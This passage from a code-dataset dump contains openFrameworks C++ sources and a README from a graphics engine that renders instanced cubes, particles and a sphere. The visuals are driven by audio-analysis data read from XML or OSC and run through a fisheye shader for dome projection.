"Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "\n\n#include \"instancedManager.h\"\n\nvoid InstancedManager::setup(){\n    \n    ofBoxPrimitive tmpBox;\n\ttmpBox.set(1.0);// set the size\n\tvboMesh = tmpBox.getMesh();\n    \n    \tshaderInst.load(\"shadersGL2/instancedRad.vert\", \"shadersGL2/instancedRad.frag\");\n    \n    _mode = LINEAL;\n    _hRes = 40;\n    _vRes = 20;\n    _width = 100;\n    _height = 30;\n    \n    Orient.set(1,1,1);\n    yPos = 0.0;\n    bDoQuilombo =false;\n    velX=1.0;\n    maskRadius=0.0;\n    \n    velCounter = 1;\n    \n    //material--\n    material.setShininess( 100 ); // shininess is a value between 0 - 128, 128 being the most shiny //\n    material.setSpecularColor(ofColor(255.f, 255.f, 255.f, 255.f));\n    material.setDiffuseColor(mainColor);\n}\n\n\n//--------------------------------------\nvoid InstancedManager::draw(){\n    \n    ofEnableDepthTest();\n\tofDisableAlphaBlending();\n\n    material.begin();\n    \n    ofPushStyle();\n\tofSetColor(mainColor);\n    \n    ofPushMatrix();\n    //set x - y\n    //lineal\n    if(_mode==LINEAL && _vRes>1)\n        ofTranslate(xPos*Lim.x, _height*(-.5) + (yPos*Lim.y),0);\n    //radial\n    else if(_mode!=LINEAL && _vRes>1)\n        ofTranslate(xPos*Lim.x, Lim.y*(.5) + (yPos*Lim.y),0);\n    \n    \n    if(Orient.x<0){\n        ofRotateY(180);\n        ofTranslate(Lim.x*Orient.x, 0);\n    }\n\n\tshaderInst.begin();//---------------------------------------\n    if (_mode == 
LINEAL)\n shaderInst.setUniform1i(\"uMode\", 0);\n else if(_mode == RAD_CONCENTRIC)\n shaderInst.setUniform1i(\"uMode\", 1);\n else if(_mode == RAD_CENTRIFUGE)\n shaderInst.setUniform1i(\"uMode\", 2);\n \n shaderInst.setUniform1f(\"uDeformRad\", radDeform);\n \n\tshaderInst.setUniform1i(\"uHres\", _hRes);\n shaderInst.setUniform1i(\"uWidth\", _width);\n shaderInst.setUniform1i(\"uVres\", _vRes);\n shaderInst.setUniform1i(\"uHeight\", _height);\n\tshaderInst.setUniform1f(\"timeValue\", (velCounter% 3000) / 3000.0f);\n //shaderInst.setUniform1f(\"timeValue_b\", ofGetElapsedTimeMillis()); //time dependant\n shaderInst.setUniform1f(\"timeValue_b\", velCounter*10.0); //frame dependant\n \n shaderInst.setUniform1f(\"uTimeNoise\", noiseTime);\n \n shaderInst.setUniform1f(\"uXnoiseFreq\", xNoiseFreq);\n shaderInst.setUniform1f(\"uXnoiseAmp\", xNoiseAmp*Orient.x);\n shaderInst.setUniform1f(\"uXnoiseRug\", xNoiseRug);\n \n shaderInst.setUniform1f(\"uYnoiseFreq\", yNoiseFreq);\n shaderInst.setUniform1f(\"uYnoiseAmp\", yNoiseAmp*Orient.x);\n shaderInst.setUniform1f(\"uYnoiseRug\", yNoiseRug);\n \n shaderInst.setUniform1f(\"uZnoiseFreq\", zNoiseFreq);\n shaderInst.setUniform1f(\"uZnoiseAmp\", zNoiseAmp*Orient.x);\n shaderInst.setUniform1f(\"uZnoiseRug\", zNoiseRug);\n \n\n vboMesh.drawInstanced(OF_MESH_FILL, _hRes * _vRes);\n \n\tshaderInst.end();//------------------------------------\n material.end();\n \n\tofDisableDepthTest();\n //----\n velCounter+=velX;\n \n ofPopMatrix();\n \n ofPopStyle();\n \n // centered black circle\n// ofPushStyle();\n// ofSetColor(ofColor::black);\n// ofDrawCircle(xPos*Lim.x + Lim.x*.5, ofGetHeight()*(.5) + (yPos*Lim.y),0, maskRadius*_height);\n// ofPopStyle();\n \n \n}\n\n\n//--------------------------------------\nvoid InstancedManager::exit(){\n\n}\n//--------------------------------------\nvoid InstancedManager::setCubeSize(float val){\n cubeSize = val;\n ofBoxPrimitive tmpBox;\n tmpBox.set(cubeSize);// set the size\n\tvboMesh = tmpBox.getMesh();\n}\n//--------------------------------------\nvoid InstancedManager::setCubeSize(ofVec3f size){\n ofBoxPrimitive tmpBox;\n tmpBox.set(size.x, size.y, size.z);\n vboMesh = tmpBox.getMesh();\n}\n\n\n\n\n" }, { "alpha_fraction": 0.6433566212654114, "alphanum_fraction": 0.6538461446762085, "avg_line_length": 15.5, "blob_id": "a929c5d3c798128b8c7f967e854b55458e9d8574", "content_id": "528678a3014d0adc24d5ff80957342eba424502e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 858, "license_type": "no_license", "max_line_length": 46, "num_lines": 52, "path": "/Graphics/apps/videoTest_2/src/GuiManager.h", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "//\n// GuiManager.h\n// videoTest_2\n//\n// Created by Leo on 4/13/16.\n//\n//\n\n#ifndef GuiManager_h\n#define GuiManager_h\n\n#include \"ofMain.h\"\n#include \"ofxGui.h\"\n\nclass GuiManager {\n\npublic:\n \n void setup();\n void draw();\n \n //gui\n ofxToggle gMode, gRadMode;\n ofxFloatSlider gRadDeform;\n \n ofxFloatSlider gWidth, gHeight, gHres,\n gVres, gVelocity, gYpos, gXpos;\n \n ofxVec3Slider gCubesize;\n ofxFloatSlider gCubesizeUnified;\n \n ofxFloatSlider gMaskRadius;\n \n ofxFloatSlider gNzTime;\n ofxFloatSlider gNzXAmp, gNzXRug, gNzXFreq;\n ofxFloatSlider gNzYAmp, gNzYRug, gNzYFreq;\n ofxFloatSlider gNzZAmp, gNzZRug, gNzZFreq;\n \n ofxToggle gUseCam;\n ofxToggle gAxis;\n ofxToggle gUseLight;\n ofxVec3Slider gLightPos;\n \n //ofxButton b1;\n \n ofxPanel gui;\n\n\n};\n\n\n#endif /* GuiManager_hpp */\n" 
}, { "alpha_fraction": 0.5102322101593018, "alphanum_fraction": 0.5337957739830017, "avg_line_length": 26.96010971069336, "blob_id": "18bc248fff66a04de4a3b1fa37fe70721c78ff59", "content_id": "125a1806d130a1a597c841a863463aefac4e14fc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 20328, "license_type": "no_license", "max_line_length": 127, "num_lines": 727, "path": "/Graphics/apps/final/src/ofApp.cpp", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#include \"ofApp.h\"\n\n/*\n Para renderizar:\n 1- SphereManager setupGui() -> zPos\n 2- setup()->renderer.setup()\n 3- update()->receiveOsc()\n */\n\n#pragma mark - Core Funcs\nint _startingFrameNum = 2359;\n//--------------------------------------------------------------\nvoid ofApp::setup(){\n \n ofSetBackgroundColor(0);\n ///FRAME RATE: 30\n ofSetFrameRate(FRAME_RATE);\n ofSetLogLevel(OF_LOG_VERBOSE);\n ofEnableAlphaBlending();\n ofEnableDepthTest();\n \n //Setup settings-----------------\n data.load(\"analysisData.xml\");\n \n int frameRate = data.getValue(\"FILE-INFO:frameRate\",0);\n int totalFramesNum = data.getValue(\"FILE-INFO:totalFramesNum\", 0);\n cout<<\"frameRate - \"<<frameRate<<endl;\n cout<<\"total frames - \"<<totalFramesNum<<endl;\n \n //renderer setup-------------------\n \n framesMaxNumber = totalFramesNum;\n frameCounter = _startingFrameNum;\n \n isAnimating = false;\n ofLogVerbose()<<\"ANIMATION INFO ---- \";\n \n \n fisheye.setup(tVariableFisheye);\n fisheyeAmount = 0.0;\n \n //renderer.setup(FRAME_RATE, PNG_SEQUENCE, r256);///init resolution and mode\n //renderer.setup(FRAME_RATE, PNG_SEQUENCE, r512);///init resolution and mode\n //renderer.setup(FRAME_RATE, PNG_SEQUENCE, r1024);///init resolution and mode\n //renderer.setup(FRAME_RATE, PNG_SEQUENCE, r2048);///init resolution and mode\n renderer.setup(FRAME_RATE, PNG_SEQUENCE, r4096);///init resolution and mode\n \n renderer.frameNumOffset = _startingFrameNum;\n \n verdana.load(\"fonts/verdana.ttf\", renderer.getFboWidth()*0.04, true, true);\n \n //----\n \n drawFbo.allocate(renderer.getFboWidth(), renderer.getFboHeight());\n fw = drawFbo.getWidth();\n fh = drawFbo.getHeight();\n \n fboPost.allocate(fw, fh);\n fboPost.begin();\n ofClear(0,0,0,1);\n fboPost.end();\n \n fboInstanced.allocate(fw, fh, GL_RGBA);\n fboInstanced.begin();\n ofClear(255,255,255, 0);\n fboInstanced.end();\n \n fboParticles.allocate(fw, fh, GL_RGBA);\n fboParticles.begin();\n ofClear(255,255,255, 0);\n fboParticles.end();\n \n fboSphere.allocate(fw, fh, GL_RGBA);\n fboSphere.begin();\n ofClear(255,255,255, 0);\n fboSphere.end();\n \n \n //gui-------------\n setupGui();\n bShowGuiCubeSphere = true;\n bShowGuiPair = true;\n bShowGuiInstanced = true;\n \n \n //----------------------------\n _center.set(fw*0.5, fh*0.5, 0.0);\n cam.disableMouseInput();\n cam.setPosition(ofVec3f(_center.x, _center.y, fw*0.7));\n cam.lookAt(_center);\n cam.setTarget(_center);\n \n light.setPosition(fw*0.2, fw*.5, fh*0.3);\n light.setPointLight();\n \n //Instanced---------------------------\n instanced.setup(fw);\n instanced.setLimits(ofVec3f(fw, fh, 100));\n instanced.setOrientation(ofVec3f(1,1,1));\n instanced.setColor(COLOR_INSTANCED);\n \n //Particles------------------\n pair.setup(0, fh*0.5, fw, fh, OUT);\n pair.setColor(COLOR_PARTICLES);\n \n //Sphere------------------------\n sphere.setup();\n sphere.setColor(COLOR_SPHERE);\n sphere.setPosition(_center);\n \n //Post-Procesing-------------------------------\n postManager.setup(fw, fh);\n 
\n //OSC------------------------------------------\n receiver.setup(PORT);\n \n oscSphereValue3 = oscSphereValue2 = oscSphereValue1 = 0;\n oscPartsValue3 = oscPartsValue2 = oscPartsValue1 = 0;\n oscInstValue2 = oscInstValue1 = 0;\n \n \n}\n\n//--------------------------------------------------------------\nvoid ofApp::update(){\n //display frame rate as window title\n ofSetWindowTitle(ofToString(ofGetFrameRate()));\n \n //animation frameNumUpdate\n if(isAnimating){\n frameCounter++;\n //end recording and animation at 15\"\n if (frameCounter>=framesMaxNumber){\n stopAnimation();\n renderer.stopRecording();\n }\n }\n \n \n //receiveOsc----------------\n //!!! Osc\n if(gReceiveOSC){\n //receiveOsc();\n updateOscFromDataFile(frameCounter);\n //updateOscFromDataFile(gFramePlayer);\n }else{\n \n }\n \n //update graphics--------------------------------\n updateInstanced();\n updatePair();\n updateSphere();\n \n \n //update post-processing------------------------\n postManager.updateValues();\n \n //light pos\n light.setPosition(gLightPos->x * fw,\n gLightPos->y * 0.8*fw,\n gLightPos->z * fw );\n \n \n //-----------------------------------\n \n int rw = renderer.getFboWidth();\n int rh = renderer.getFboHeight();\n \n ///draw openGL scene in drawFbo------------------\n drawFboInstanced();\n drawFboParticles();\n drawFboSphere();\n \n drawFboMain();\n \n drawFboPost();\n ///-------------------------------\n \n \n fisheyeAmount = 0.6;\n renderer.getFbo()->begin();\n ofClear(0);\n fisheye.begin(fboPost.getTexture(), rw, rh, fisheyeAmount);///which fbo to render\n glBegin(GL_QUADS);\n glTexCoord2f(0, 0); glVertex3f(0, 0, 0);\n glTexCoord2f(rw, 0); glVertex3f(rw, 0, 0);\n glTexCoord2f(rw, rh); glVertex3f(rw, rh, 0);\n glTexCoord2f(0,rh); glVertex3f(0, rh, 0);\n glEnd();\n fisheye.end();\n renderer.getFbo()->end();\n \n //Record Renderer's FBO into a .mov file or png sequence\n renderer.update();\n\n\n \n}\n\n//--------------------------------------------------------------\nvoid ofApp::draw(){\n \n ofBackground(0);\n \n \n //fboPost.draw(ofGetWidth()-768, 0, fw, fh);\n renderer.draw(ofGetWidth()-768, 0, 768, 768);\n\n \n //drawGuis------------------\n if (bShowGuiInstanced)\n instanced.drawGui();\n if(bShowGuiPair)\n guiPair.draw();\n if(bShowGuiCubeSphere)\n sphere.drawGui();\n \n guiMain.draw();\n \n postManager.drawGui(200,500);\n \n \n //Recording indicator-------------------\n if(renderer.getIsRecording()){\n ofPushStyle();\n ofPushMatrix();\n ofTranslate(ofGetWidth() - 60, 60);\n ofSetColor(255, 0, 0);\n ofDrawCircle(0,0, 40);\n ofSetColor(ofColor::white);\n ofDrawBitmapString(\"REC\", -10, 0);\n ofPopMatrix();\n ofPopStyle();\n }\n \n //Display Key commands-----------------\n ofPushStyle();\n string keys = \"KEY COMMANDS:\";\n keys += \"\\nSpacebar: START/STOP Animation\"\n \"\\nr: START/STOP Recording & Animation\"\n \"\\np: Secuencia Png\"\n \"\\nm: Archivo MOV-H264\"\n \"\\n1: 256x256\"\n \"\\n2: 512x512\"\n \"\\n3: 1024x1024\"\n \"\\n4: 2048x2048\"\n \"\\n5: 4096x4096\";\n ofSetColor(ofColor::white);\n ofDrawBitmapString(keys, ofGetWidth()-200, 20);\n ofPopStyle();\n \n //Display Info-----------------\n ofPushStyle();\n string info = \"INFO: \";\n info += \"\\nfps: \"+ofToString(ofGetFrameRate())\n + \"\\nFBO output res: \" + renderer.getResolutionAsString()\n + \"\\nREC mode: \" + renderer.getRecordingModeAsString() +\n + \"\\nframeCounter: \" + ofToString(frameCounter);\n if(renderer.getIsRecording()){\n info += \"\\nRECORDING FRAME NUM: \" + ofToString(ofGetFrameNum() - 
renderer.getLastFrameMarker());\n }\n ofSetColor(ofColor::yellow);\n ofDrawBitmapString(info, ofGetWidth()-200, ofGetHeight()-100);\n ofPopStyle();\n\n \n \n}\n\n\n//--------------------------------------------------------------\nvoid ofApp::keyPressed(int key){\n \n switch (key){\n// case 'a':\n// pair.addPartGroup(1);\n// break;\n// case 'k':\n// pair.addPartGroup(2);\n// break;\n \n \n \n //start-stop Animation--------------------\n case ' ':\n if(!isAnimating)startAnimation();\n else stopAnimation();\n break;\n //start-stop Animation & Recording---------------\n case 'r':\n if(!renderer.getIsRecording())renderer.startRecording();\n else renderer.stopRecording();\n \n if(!isAnimating)startAnimation();\n else stopAnimation();\n break;\n \n// //change recording mode---------------\n// case 'p':\n// if(renderer.getRecordingMode()!=PNG_SEQUENCE) renderer.setRecordingMode(PNG_SEQUENCE);\n// break;\n// case 'm':\n// if(renderer.getRecordingMode()!=MOV_FILE) renderer.setRecordingMode(MOV_FILE);\n// break;\n \n default:\n break;\n }\n \n}\n#pragma mark - Fbo draw funcs\n//--------------------------------------------------------------\nvoid ofApp::drawDomeLimits(int w, int h){\n \n \n //ofBackground(255);\n int x = w*0.5;\n int y = h*0.5;\n int rad = w*0.5;\n \n ofPushStyle();\n ofSetCircleResolution(30);\n ofNoFill();\n //full\n ofSetColor(ofColor::red);\n ofDrawCircle(x,y,rad);\n// //mid\n// ofSetColor(ofColor::orange);\n// ofDrawCircle(x,y,rad*0.66);\n// //small\n// ofSetColor(ofColor::yellow);\n// ofDrawCircle(x,y,rad*0.33);\n \n \n ofPopStyle();\n}\n//--------------------------------------------------------------\nvoid ofApp::drawFboPost(){\n\n fboPost.begin();\n ofClear(0,0,0,1);\n \n ofDisableAlphaBlending();\n \n postManager.begin();\n drawFbo.draw(0,0);\n postManager.end();\n \n fboPost.end();\n \n ofEnableAlphaBlending();\n}\n//--------------------------------------------------------------\nvoid ofApp::drawFboMain(){\n \n drawFbo.begin();\n \n ofClear(0, 0, 0, 0);\n \n if(gDoDrawInstanced)fboInstanced.draw(0,0);\n \n if(gDoDrawParts) fboParticles.draw(0,0);\n \n \n if(gDoDrawSphere) fboSphere.draw(0,0);\n \n if(gDoDrawDomeLimits) drawDomeLimits(fw, fh);\n \n drawFbo.end();\n}\n//--------------------------------------------------------------\nvoid ofApp::drawFboInstanced(){\n \n \n ofEnableAlphaBlending();\n \n fboInstanced.begin();\n ofClear(255,255,255, 0);\n //----------------------------\n if(gUseLight){\n ofEnableLighting();\n light.enable();\n \n //tweak\n light.setPosition(gLightPos->x * fw,\n gLightPos->y * 0.8*fw,\n 0.05 * fw );\n }\n \n cam.begin();\n \n //??? hacen falta estos guachines?\n ofEnableDepthTest();\n ofDisableAlphaBlending();\n //-----------------------\n \n instanced.drawScene();\n \n \n ofDisableDepthTest();//??? 
hace falta?\n \n cam.end();\n \n if(gUseLight){\n light.disable();\n ofDisableLighting();\n }\n //----------------------------\n fboInstanced.end();\n \n \n \n}\n//--------------------------------------------------------------\nvoid ofApp::drawFboParticles(){\n\n fboParticles.begin();\n ofClear(255,255,255, 0);\n //----------------------------\n if(gUseLight){\n ofEnableLighting();\n light.enable();\n \n //tweak\n light.setPosition(gLightPos->x * fw,\n gLightPos->y * 0.8*fw,\n 0.05 * fw );\n }\n\n if(gUseCam)cam.begin();\n\n \n ofEnableDepthTest();\n ofEnableAlphaBlending();\n \n ///DRAW pair\n pair.drawScene();\n \n \n if(gUseCam)cam.end();\n \n if(gUseLight){\n light.disable();\n ofDisableLighting();\n }\n \n ofDisableDepthTest();\n //----------------------------\n fboParticles.end();\n}\n//--------------------------------------------------------------\nvoid ofApp::drawFboSphere(){\n \n fboSphere.begin();\n ofClear(255,255,255, 0);\n //----------------------------\n \n ofEnableDepthTest();\n \n if(gUseLight){\n ofEnableLighting();\n light.enable();\n \n //tweak\n light.setPosition(gLightPos->x * fw,\n gLightPos->y * 0.8*fw,\n gLightPos->z * fw );\n }\n\n cam.begin();\n \n ///drawSphere---------\n sphere.drawScene();\n ///---------\n \n if(gUseLight){\n light.disable();\n ofDisableLighting();\n }\n \n cam.end();\n \n ofDisableDepthTest();\n \n //----------------------------\n fboSphere.end();\n\n}\n#pragma mark - Updates\n//--------------------------------------------------------------\nvoid ofApp::updatePair(){\n \n int w = fw;\n \n guiPair.update();\n \n std::map<string, float> oscData;\n \n oscData[KEY_DIST_TRESHOLD] = guiPair.gDistTreshold;///osc\n oscData[KEY_PARTS_NUM] = guiPair.gPartsNum;\n oscData[KEY_X_VELOCITY] = guiPair.gXvelocity * w * 0.001;///osc\n //oscData[KEY_RADIUS_INIT] = guiPair.gRadiusInit;\n oscData[KEY_RADIUS_INIT] = 0.009 * w;\n oscData[KEY_RADIUS_VAR] = guiPair.gRadiusVar;///osc\n oscData[KEY_ANGLE_INIT] = guiPair.gAngleInit;\n oscData[KEY_ANGLE_VAR] = guiPair.gAngleVar;\n //nz\n oscData[KEY_ANGLE_NZ_AMP] = guiPair.gNzAngleAmp;\n oscData[KEY_ANGLE_NZ_FREQ] = guiPair.gNzAngleFreq;\n oscData[KEY_RADIUS_NZ_AMP] = 0.002 * w;\n oscData[KEY_RADIUS_NZ_FREQ]= guiPair.gNzRadFreq;\n oscData[KEY_X_NZ_AMP] = guiPair.gNzXposAmp;\n oscData[KEY_X_NZ_FREQ] = guiPair.gNzXposFreq;\n oscData[KEY_PART_SIZE] = w*0.001 * 8;\n oscData[KEY_PARTS_RATE] = 50;\n \n pair.setDistanceTreshold(guiPair.gDistTreshold);\n \n if(gReceiveOSC){\n oscData[KEY_PART_SIZE] = 20 * oscPartsValue1 * w*0.001;\n oscData[KEY_RADIUS_VAR] = 0.2*w * oscPartsValue2 * guiPair.gRadiusVar * 0.1;//specComp\n oscData[KEY_X_VELOCITY] = guiPair.gXvelocity * w * 0.001 + oscPartsValue3 * guiPair.gXvelocity * w * 0.0075;//inharm\n pair.setDistanceTreshold(0.07*w * oscPartsValue1 * 0.1 * guiPair.gDistTreshold);//power\n }\n\n std::map<string, float> pairData_A = oscData;\n std::map<string, float> pairData_B = oscData;\n \n pair.update(pairData_A, pairData_B);\n \n}\n\n//--------------------------------------------------------------\nvoid ofApp::updateSphere(){\n \n int w = fw;\n \n float x = sphere.xGui;\n float y = sphere.yGui;\n float vol = sphere.volumeGui;\n float rad = sphere.radiusGui;\n\n\n if(gReceiveOSC){\n //valores que cambian con osc son estos 4:\n rad = oscSphereValue3 * sphere.radiusGui;//specComp\n x = oscSphereValue2 * sphere.xGui ;//confidence\n y = .001 + oscSphereValue3 * sphere.yGui ;//specComp\n vol = 0.25 + oscSphereValue1 * sphere.volumeGui;//power\n \n }\n \n //sphere.dispNzAmnt = 
sphere.strengthGui;\n \n sphere.displacement.update(x, y, vol, rad, sphere.resolGui, ofGetFrameNum()*sphere.velGui);\n \n \n}\n//--------------------------------------------------------------\nvoid ofApp::updateInstanced(){\n \n int w = fw;\n \n //update instancedManager values\n if(!instanced.gMode)instanced.setMode(LINEAL);\n else if(instanced.gMode && !instanced.gRadMode) instanced.setMode(RAD_CONCENTRIC);\n else if(instanced.gMode && instanced.gRadMode){\n instanced.setMode(RAD_CENTRIFUGE);\n instanced.setRadDeform(instanced.gRadDeform);\n }\n \n instanced.setWidth(instanced.gWidth);\n instanced.setHeight(instanced.gHeight);\n instanced.setCubeSize(instanced.gCubesizeUnified * MAX_CUBESIZE*w);\n \n instanced.setMaskRadius(instanced.gMaskRadius);///osc\n \n instanced.setHres(instanced.gHres * MAX_H_RES);\n instanced.setVres(instanced.gVres * MAX_V_RES);\n \n instanced.setVelocity(instanced.gVelocity * MAX_VELOCITY);///osc\n \n instanced.setXpos(instanced.gXpos);\n instanced.setYpos(instanced.gYpos);\n instanced.setZpos(instanced.gZpos);\n //nz\n instanced.setNzTime(instanced.gNzTime * MAX_NZ_TIME);\n \n instanced.setXnzAmp(instanced.gNzXAmp * MAX_NZ_AMP*w);///osc\n instanced.setXnzFreq(instanced.gNzXFreq * MAX_NZ_FREQ);\n instanced.setXnzRug(instanced.gNzXRug * MAX_NZ_RUG*w);\n \n instanced.setYnzAmp(instanced.gNzYAmp * MAX_NZ_AMP*w);\n instanced.setYnzFreq(instanced.gNzYFreq * MAX_NZ_FREQ);\n instanced.setYnzRug(instanced.gNzYRug * MAX_NZ_RUG*w);\n \n instanced.setZnzAmp(instanced.gNzZAmp * MAX_NZ_AMP*w);///osc\n instanced.setZnzFreq(instanced.gNzZFreq * MAX_NZ_FREQ);\n instanced.setZnzRug(instanced.gNzZRug * MAX_NZ_RUG*w);\n \n if(gReceiveOSC){\n \n instanced.setZnzAmp(oscInstValue2 * MAX_NZ_AMP*w * instanced.gNzZAmp*10);//inharm\n instanced.setMaskRadius(0.5 - oscInstValue1*0.5);//power\n \n }\n\n\n}\n//--------------------------------------------------------------\nvoid ofApp::receiveOsc(){\n \n \n // check for waiting messages\n while(receiver.hasWaitingMessages()){\n // get the next message\n ofxOscMessage m;\n receiver.getNextMessage(&m);\n \n \n //sphere\n if(m.getAddress()==\"/ch0\"){\n\n oscSphereValue1 = m.getArgAsFloat(0);//power\n oscSphereValue2 = m.getArgAsFloat(2);//confidence\n oscSphereValue3 = m.getArgAsFloat(6);//spec-comp\n }\n //partSystem\n else if(m.getAddress()==\"/ch1\"){\n oscPartsValue1 = m.getArgAsFloat(0);//power\n oscPartsValue2 = m.getArgAsFloat(6);//specComp\n oscPartsValue3 = m.getArgAsFloat(7);//inharm\n \n }\n //instanced\n else if(m.getAddress()==\"/ch2\"){\n oscInstValue1 = m.getArgAsFloat(0);//power\n oscInstValue2 = m.getArgAsFloat(6);//specComp\n }\n\n \n }\n \n \n}\n//--------------------------------------------------------------\nvoid ofApp::updateOscFromDataFile(int frameNum){\n \n \n \n string frameNumStr = ofToString(frameNum);\n \n oscSphereValue1 = data.getValue(\"ANALYSIS-DATA:FRAME-\" + frameNumStr + \":ANALYZER:CHANNEL-0:POWER\",0.0);\n oscSphereValue2 = data.getValue(\"ANALYSIS-DATA:FRAME-\" + frameNumStr + \":ANALYZER:CHANNEL-0:PITCHCONF\", 0.0);\n oscSphereValue3 = data.getValue(\"ANALYSIS-DATA:FRAME-\" + frameNumStr + \":ANALYZER:CHANNEL-0:SPECCOMP\", 0.0);\n \n oscPartsValue1 = data.getValue(\"ANALYSIS-DATA:FRAME-\" + frameNumStr + \":ANALYZER:CHANNEL-1:POWER\",0.0);\n oscPartsValue2 = data.getValue(\"ANALYSIS-DATA:FRAME-\" + frameNumStr + \":ANALYZER:CHANNEL-1:SPECCOMP\", 0.0);\n oscPartsValue3 = data.getValue(\"ANALYSIS-DATA:FRAME-\" + frameNumStr + \":ANALYZER:CHANNEL-1:INHARM\", 0.0);\n \n \n oscInstValue1 = 
data.getValue(\"ANALYSIS-DATA:FRAME-\" + frameNumStr + \":ANALYZER:CHANNEL-2:POWER\",0.0);\n oscInstValue2= data.getValue(\"ANALYSIS-DATA:FRAME-\" + frameNumStr + \":ANALYZER:CHANNEL-2:SPECCOMP\", 0.0);\n \n \n}\n\n#pragma mark - Other funcs\n//--------------------------------------------------------------\nvoid ofApp::setupGui(){\n \n //-----------------------------------\n guiMain.setup(\"Main Panel\");\n guiMain.setPosition(0, 0);\n guiMain.add(gDoPostProcessing.setup(\"Post-Proc\", true));\n guiMain.add(gReceiveOSC.setup(\"Receive Osc\", true));\n guiMain.add(gDoDrawInstanced.setup(\"Draw Inst\", true));\n guiMain.add(gDoDrawSphere.setup(\"Draw Sphere\", true));\n guiMain.add(gDoDrawParts.setup(\"Draw Parts\", true));\n guiMain.add(gDoDrawDomeLimits.setup(\"Draw Dome Lim\", false));\n guiMain.add(gLightPos.setup(\"LighPos\", ofVec3f(0.5, 0.5, 0.65), ofVec3f(0.0), ofVec3f(1.0)));\n guiMain.add(gUseCam.setup(\"useCam\", true));\n guiMain.add(gAxis.setup(\"axis\", true));\n guiMain.add(gUseLight.setup(\"useLight\", true));\n guiMain.add(gFisheye.setup(\"fisheye\", 0.6, 0.0, 1.0));\n guiMain.add(gFramePlayer.setup(\"frames\", 3481, 0, 4836));\n \n\n \n //--------------------------\n guiPair.setup();\n guiPair.gui.setPosition(200, 0);\n\n \n}\n\n//--------------------------------------------------------------\nvoid ofApp::resetCamera(){\n \n cam.setPosition(ofVec3f(fw*0.5, fh*0.5, 500.0));\n cam.lookAt(ofVec3f( fw*0.5, fh*0.5, 0.0));\n cam.setTarget(ofVec3f( fw*0.5, fh*0.5, 0.0));\n\n}\n//--------------------------------------------------------------\nvoid ofApp::triggerOnset(){\n \n pair.addPartGroup(1);\n pair.addPartGroup(2);\n\n}\n\n#pragma mark - Animation\n\n//--------------------------------------------------------------\nvoid ofApp::startAnimation(){\n isAnimating=true;\n ofLogNotice(\"Animation STARTED\");\n}\n//--------------------------------------------------------------\nvoid ofApp::stopAnimation(){\n frameCounter = _startingFrameNum;\n lastFrameWithOnset = 0;\n isAnimating = false;\n ofLogNotice(\"Animation STOPED\");\n}\n\n" }, { "alpha_fraction": 0.7808219194412231, "alphanum_fraction": 0.7853881120681763, "avg_line_length": 42.79999923706055, "blob_id": "8de779e5c57d73316807a440ef080fee6e34db6a", "content_id": "98f8d7a741ef0230c3c5697a8dc6d0f9f3cf4d1f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 438, "license_type": "no_license", "max_line_length": 229, "num_lines": 10, "path": "/Graphics/examples/ofxFisheyeExample/README.md", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "# ofxFisheye\t\n\n### Description\nExample app of the ofxFisheye addon. It applies different types of Fisheye Lens filters to an image using GLSL shaders.\n\n### Dependencies\n* addons: ofxFisheye.\n\n### Compilation\nThe Graphics Engine of the LHCVMM is developed using openFrameworks v0.9 (www.openFrameworks.com). To compile the examples in this repository you need to clone lhcvmm main directory into OF root dir (OF_ROOT_DIR/lhcvmm/Graphics/)\n" } ]
62
eepgwde/blkswn
https://github.com/eepgwde/blkswn
4a533a46585db5c518c8b5573c16b3b9c759c4eb
f7677273b18f7607fe37e4a1feaf3ed3ae9c7373
01d7a40e406b7064687146fa90bf394d71a938bc
refs/heads/master
2020-05-25T21:28:12.061153
2019-05-18T13:49:46
2019-05-18T13:49:46
187,999,201
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5387936234474182, "alphanum_fraction": 0.5643271207809448, "avg_line_length": 27.639575958251953, "blob_id": "7c0a2f0815db3e3cbb74019edb00482b205eefb0", "content_id": "a145518281dff608fe08428eccfeead67622ce95", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8115, "license_type": "no_license", "max_line_length": 96, "num_lines": 283, "path": "/tests/test_Test3.py", "repo_name": "eepgwde/blkswn", "src_encoding": "UTF-8", "text": "\"\"\"\nTest file \n\n\"\"\"\n## @file Test3.py\n# @author weaves\n# @brief Unittest\n#\n# @note\n#\n# Relatively complete test of IceFireA\n\nimport sys, logging, os\nfrom unidecode import unidecode\nfrom datetime import datetime, timezone, timedelta, date\nfrom collections import Counter\nimport re\nimport itertools\nfrom functools import partial\nfrom urllib.parse import urlparse\n\nfrom blkswn import Configuration\nfrom blkswn import IceFire\nfrom blkswn import IceFireR\nfrom blkswn import IceFireA\n\nimport unittest\n\nlogfile = os.environ['X_LOGFILE'] if os.environ.get('X_LOGFILE') is not None else \"test.log\"\nlogging.basicConfig(filename=logfile, level=logging.DEBUG)\nlogger = logging.getLogger('Test')\nsh = logging.StreamHandler()\nlogger.addHandler(sh)\n\ntrs0 = os.path.join(os.path.dirname(__file__), \"test.txt\")\n\n\nclass Test3(unittest.TestCase):\n \"\"\"\n A source directory dir0 is taken from the environment as SDIR or \n is tests/media and should contain .m4a files.\n A file tests/p1.lst is also needed. It can list the files in the\n directory.\n \"\"\"\n queue0 = None\n\n dir0 = os.getcwd()\n files0 = []\n files = []\n logger = None\n x0 = \"empty\"\n\n ## Sets pandas options and logging.\n @classmethod\n def setUpClass(cls):\n global logger\n cls.logger = logger\n Configuration.instance(file='blkswn.cfg') # singleton\n\n ## Logs out.\n @classmethod\n def tearDownClass(cls):\n pass\n\n ## Null setup.\n def setUp(self):\n self.logger.info('setup')\n\n ## Null tear down\n def tearDown(self):\n self.logger.info('tearDown')\n\n ## Constructs\n def test_000(self):\n return\n chs = IceFireR(config = Configuration.instance().config,\n type0='books',\n logger=self.logger)\n\n ichs = iter(chs)\n\n v0 = next(chs)\n self.logger.info(\"dict: {type0} {cnt} {keys}\"\n .format(type0=type(v0), cnt=len(v0), keys=\", \".join(v0.keys())))\n self.logger.info(\"dict: {url}\".format(url=v0['url']))\n\n v0 = next(chs)\n 